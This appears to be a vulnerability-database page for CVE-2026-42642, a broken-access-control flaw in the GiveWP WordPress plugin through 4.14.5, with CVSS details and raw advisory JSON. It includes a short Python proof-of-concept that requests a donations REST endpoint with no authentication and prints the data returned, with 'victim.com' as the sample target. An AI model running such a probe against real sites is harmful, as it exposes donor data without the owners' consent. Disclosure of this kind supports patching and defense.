Security Vulnerability Report
中文
CVE-2026-42642 CVSS 5.3 MEDIUM

CVE-2026-42642

Published: 2026-04-29 12:16:19
Last Modified: 2026-04-29 21:15:42

Description

Missing Authorization vulnerability in StellarWP GiveWP give allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects GiveWP: from n/a through <= 4.14.5.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

StellarWP GiveWP <= 4.14.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests def check_cve_2026_42642(target_url): # Exploit: Access restricted endpoint without authentication # The vulnerability allows unauthorized access to sensitive data. endpoint = "/wp-json/give/v2/donations" # Example sensitive endpoint full_url = target_url + endpoint try: # Send GET request without cookies or auth headers response = requests.get(full_url, timeout=10) if response.status_code == 200: print(f"[+] Vulnerability Confirmed! Data accessible at: {full_url}") print("[+] Response snippet:", response.text[:100]) else: print(f"[-] Target not vulnerable. Status code: {response.status_code}") except Exception as e: print(f"[!] Error occurred: {e}") # Example usage # check_cve_2026_42642("http://victim.com")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-42642", "sourceIdentifier": "[email protected]", "published": "2026-04-29T12:16:19.393", "lastModified": "2026-04-29T21:15:41.667", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in StellarWP GiveWP give allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects GiveWP: from n/a through <= 4.14.5."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/give/vulnerability/wordpress-givewp-plugin-4-14-5-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}